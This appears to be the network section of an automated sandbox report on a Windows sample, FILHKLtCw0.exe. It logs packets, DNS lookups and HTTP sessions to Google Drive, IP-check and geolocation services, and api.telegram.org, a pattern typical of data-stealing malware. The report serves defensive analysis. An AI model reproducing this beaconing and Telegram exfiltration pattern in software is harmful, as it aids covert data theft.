                                                                                                            Jan 10, 2025 20:24:19.237515926 CET59250443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:19.237528086 CET44359250149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:19.237586975 CET59250443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:19.237593889 CET44359250149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:19.416161060 CET44359250149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:19.416254044 CET44359250149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:19.416311979 CET59250443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:19.416851044 CET59250443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:19.420331955 CET5924980192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:19.421227932 CET5925180192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:19.425364971 CET8059249193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:19.425425053 CET5924980192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:19.426022053 CET8059251193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:19.426080942 CET5925180192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:19.426176071 CET5925180192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:19.430898905 CET8059251193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:20.943557978 CET8059251193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:20.944905996 CET59252443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:20.944941998 CET44359252149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:20.945003986 CET59252443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:20.945369959 CET59252443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:20.945382118 CET44359252149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:20.984673023 CET5925180192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:21.558640957 CET44359252149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:21.560440063 CET59252443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:21.560460091 CET44359252149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:21.560519934 CET59252443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:21.560530901 CET44359252149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:21.746572971 CET44359252149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:21.746650934 CET44359252149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:21.746725082 CET59252443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:21.747239113 CET59252443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:21.750993967 CET5925180192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:21.752263069 CET5925380192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:21.756077051 CET8059251193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:21.756148100 CET5925180192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:21.757092953 CET8059253193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:21.757165909 CET5925380192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:21.757296085 CET5925380192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:21.762058020 CET8059253193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:22.398592949 CET8059253193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:22.399981022 CET59254443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:22.400048018 CET44359254149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:22.400120974 CET59254443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:22.400408983 CET59254443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:22.400430918 CET44359254149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:22.453470945 CET5925380192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:23.028553009 CET44359254149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.044106007 CET59254443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:23.044117928 CET44359254149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.044162035 CET59254443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:23.044171095 CET44359254149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.224107981 CET44359254149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.224317074 CET44359254149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.224402905 CET59254443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:23.226120949 CET59254443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:23.293311119 CET5925380192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:23.296190023 CET5925580192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:23.298713923 CET8059253193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.298777103 CET5925380192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:23.301103115 CET8059255193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.301175117 CET5925580192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:23.301420927 CET5925580192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:23.306226015 CET8059255193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.927546024 CET8059255193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.929364920 CET59256443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:23.929416895 CET44359256149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.929488897 CET59256443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:23.929933071 CET59256443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:23.929944992 CET44359256149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:23.969058037 CET5925580192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:24.562628031 CET44359256149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:24.565634012 CET59256443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:24.565648079 CET44359256149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:24.565711021 CET59256443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:24.565717936 CET44359256149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:24.812788010 CET44359256149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:24.812856913 CET44359256149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:24.813585997 CET59256443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:24.816179037 CET59256443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:24.820483923 CET5925580192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:24.821501970 CET5925780192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:24.825454950 CET8059255193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:24.825524092 CET5925580192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:24.826370001 CET8059257193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:24.826508999 CET5925780192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:24.826559067 CET5925780192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:24.831331015 CET8059257193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:25.472788095 CET8059257193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:25.474172115 CET59258443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:25.474210978 CET44359258149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:25.474293947 CET59258443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:25.474608898 CET59258443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:25.474625111 CET44359258149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:25.516109943 CET5925780192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:26.099781990 CET44359258149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:26.101670027 CET59258443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:26.101701021 CET44359258149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:26.101783037 CET59258443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:26.101788998 CET44359258149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:26.278769016 CET44359258149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:26.278846025 CET44359258149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 20:24:26.278907061 CET59258443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:28.892443895 CET59258443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 20:24:28.895052910 CET5925780192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:28.895467997 CET5925980192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:28.900197029 CET8059257193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:28.900268078 CET5925780192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:28.900352955 CET8059259193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:28.900492907 CET5925980192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:28.900492907 CET5925980192.168.2.5193.122.6.168
                                                                                                            Jan 10, 2025 20:24:28.905325890 CET8059259193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:29.556304932 CET8059259193.122.6.168192.168.2.5
                                                                                                            Jan 10, 2025 20:24:29.609755039 CET5925980192.168.2.5193.122.6.168
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 20:22:40.244961977 CET53598151.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 20:22:40.709976912 CET53532041.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 20:23:55.158039093 CET5545753192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 20:23:55.164729118 CET53554571.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 20:23:56.236675978 CET5415153192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 20:23:56.243846893 CET53541511.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 20:24:00.544954062 CET5481753192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 20:24:00.551928043 CET53548171.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 20:24:02.725830078 CET5635253192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET53563521.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 20:24:09.742088079 CET5413653192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 20:24:09.749572992 CET53541361.1.1.1192.168.2.5
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 20:23:55.158039093 CET192.168.2.51.1.1.10xbe4aStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:23:56.236675978 CET192.168.2.51.1.1.10xfbd6Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:00.544954062 CET192.168.2.51.1.1.10x9e4fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.725830078 CET192.168.2.51.1.1.10xdc86Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:09.742088079 CET192.168.2.51.1.1.10xd75fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 20:23:55.164729118 CET1.1.1.1192.168.2.50xbe4aNo error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:23:56.243846893 CET1.1.1.1192.168.2.50xfbd6No error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:00.551928043 CET1.1.1.1192.168.2.50x9e4fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:00.551928043 CET1.1.1.1192.168.2.50x9e4fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:00.551928043 CET1.1.1.1192.168.2.50x9e4fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:00.551928043 CET1.1.1.1192.168.2.50x9e4fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:00.551928043 CET1.1.1.1192.168.2.50x9e4fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:00.551928043 CET1.1.1.1192.168.2.50x9e4fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET1.1.1.1192.168.2.50xdc86No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET1.1.1.1192.168.2.50xdc86No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET1.1.1.1192.168.2.50xdc86No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET1.1.1.1192.168.2.50xdc86No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET1.1.1.1192.168.2.50xdc86No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET1.1.1.1192.168.2.50xdc86No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:02.733406067 CET1.1.1.1192.168.2.50xdc86No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 20:24:09.749572992 CET1.1.1.1192.168.2.50xd75fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • drive.google.com
                                                                                                            • drive.usercontent.google.com
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.559242193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:00.562228918 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:02.238684893 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 20:24:02.243115902 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 20:24:02.473367929 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 20:24:09.527010918 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 20:24:09.738154888 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:09 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.559245193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:10.898528099 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 20:24:13.667979956 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:13 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.559247193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:14.680499077 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:17.055259943 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:16 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.559249193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:17.958719969 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:18.601851940 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.559251193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:19.426176071 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:20.943557978 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:20 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.559253193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:21.757296085 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:22.398592949 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.559255193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:23.301420927 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:23.927546024 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:23 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.559257193.122.6.168805852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:24.826559067 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:25.472788095 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


